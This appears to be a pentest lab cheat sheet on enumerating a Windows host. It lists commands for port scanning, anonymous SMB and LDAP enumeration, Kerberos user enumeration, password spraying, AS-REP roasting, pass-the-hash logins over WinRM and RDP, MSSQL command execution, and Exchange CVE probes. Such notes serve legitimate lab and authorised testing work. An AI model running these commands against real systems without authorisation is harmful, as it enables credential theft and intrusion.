Recon & Enum

Sections Recon & Enum

External enum against a Windows target. Service deep-dives overlap with Service Enum but Windows hosts open a different set of ports.

T=10.10.11.50

i. Port scan, Windows fingerprint 

nmap -p- --min-rate 10000 -T4 -Pn -n -oG fast.gnmap "$T"
PORTS=$(grep -oP '\d+/open' fast.gnmap | cut -d/ -f1 | paste -sd,)
nmap -p"$PORTS" -sCV -Pn -n -oA full "$T"

Ports that suggest Windows:

  • 88 Kerberos -> Domain Controller, see AD MOC
  • 135 MSRPC endpoint mapper
  • 139, 445 SMB / NetBIOS
  • 389, 636, 3268, 3269 LDAP / Global Catalog -> DC
  • 464 kpasswd -> DC
  • 593 RPC over HTTP
  • 3389 RDP
  • 5985, 5986 WinRM (HTTP, HTTPS)
  • 47001 WinRM HTTP listener
  • 49152-65535 RPC dynamic range

DC vs member server: 88 + 389 + 445 + 53 open -> almost certainly a DC.

ii. SMB (139, 445)

The most useful single port on Windows. Full SMB depth in Service Enum -> SMB.

nxc smb "$T"
nxc smb "$T" --shares -u '' -p ''
nxc smb "$T" --users -u '' -p ''
enum4linux-ng -A "$T"

Anonymous share access (rare on modern Win, common on legacy):

smbclient -L "//$T" -N
smbclient "//$T/IPC$" -N

Vuln scripts worth running once:

nmap -p445 --script="smb-vuln-*" "$T"
Hostname and domain leak from SMB

Even without creds, nxc smb $T returns hostname, OS, domain. Grab them, you’ll need them for Kerberos and LDAP.

iii. LDAP (389, 636)

Full enum in LDAP . First touch:

nxc ldap "$T"
ldapsearch -x -H "ldap://$T" -s base namingcontexts

If anonymous bind works, dump the directory.

iv. Kerberos (88)

User enum without creds, the easy win on Insane boxes:

kerbrute userenum -d corp.local --dc "$T" /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

Once you have valid usernames, AS-REP roast (no creds needed for asreproastable users):

impacket-GetNPUsers corp.local/ -dc-ip "$T" -usersfile users.txt -format hashcat -outputfile asrep.hash

Password spray:

kerbrute passwordspray -d corp.local --dc "$T" users.txt 'Winter2024!'

v. WinRM (5985, 5986) 

nxc winrm "$T" -u "$USER" -p "$PASS"

Login with creds, full PowerShell remoting:

evil-winrm -i "$T" -u "$USER" -p "$PASS"
## hash auth (PtH for WinRM):
evil-winrm -i "$T" -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c'

vi. RDP (3389) 

nxc rdp "$T" -u "$USER" -p "$PASS"
nmap -p3389 --script="rdp-enum-encryption,rdp-vuln-ms12-020" "$T"
xfreerdp /v:"$T" /u:"$USER" /p:"$PASS" /dynamic-resolution /drive:share,/tmp

Pass-the-hash to RDP (if Restricted Admin Mode is on):

xfreerdp /v:"$T" /u:Administrator /pth:8846f7eaee8fb117ad06bdd830b7586c /restricted-admin

NLA disabled = screenshot the login screen for username hints:

nmap -p3389 --script rdp-screenshot "$T"

vii. MSSQL (1433) 

nxc mssql "$T" -u "$USER" -p "$PASS"
nxc mssql "$T" -u "$USER" -p "$PASS" --local-auth
nxc mssql "$T" -u "$USER" -p "$PASS" -x "whoami"

Hash capture via xp_dirtree, see Service Enum -> MSSQL.

viii. WMI / WMIC (over RPC)

Remote query if you have creds:

nxc wmi "$T" -u "$USER" -p "$PASS"
impacket-wmiquery -username "$USER" -password "$PASS" "$T" "SELECT * FROM Win32_OperatingSystem"

ix. IIS and other HTTP fingerprints 

curl -sI "http://$T"
curl -sI "https://$T"
## Server: Microsoft-IIS/X.Y  -> IIS version reveals OS:
## IIS 7.0 = Server 2008
## IIS 7.5 = Server 2008 R2 / Win7
## IIS 8.0 = Server 2012 / Win8
## IIS 8.5 = Server 2012 R2 / Win8.1
## IIS 10.0 = Server 2016+ / Win10+

Common Windows web tech to look for in Web MOC :

  • ASP.NET (.aspx, __VIEWSTATE)
  • SharePoint (/_layouts/, /_vti_bin/)
  • Exchange OWA (/owa/, /ecp/)
  • IIS short name disclosure (/anything*~1*/.aspx)

x. Exchange-specific

If Exchange is exposed (OWA, ECP, MAPI, EWS, Autodiscover), the foothold may be a Microsoft CVE. Quick checks:

## ProxyShell / ProxyLogon / ProxyNotShell detection
nxc smb "$T" -M exchange
nmap --script http-vuln-cve2021-26855 -p443 "$T"
curl -s "https://$T/owa/" -k -I
curl -s "https://$T/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" -k

xi. Save the fingerprint

After enum, you should know:

  • Windows version / build / SP
  • Hostname and FQDN
  • Domain name and DC name
  • Open ports and services
  • Any usernames discovered (via SMB, RDP screenshot, kerbrute)
  • Any creds tested (even failures help spray planning)

Then jump to Initial Access for foothold patterns (web, SMB, RDP brute, Kerberos abuse) and AD MOC if the host is domain-joined.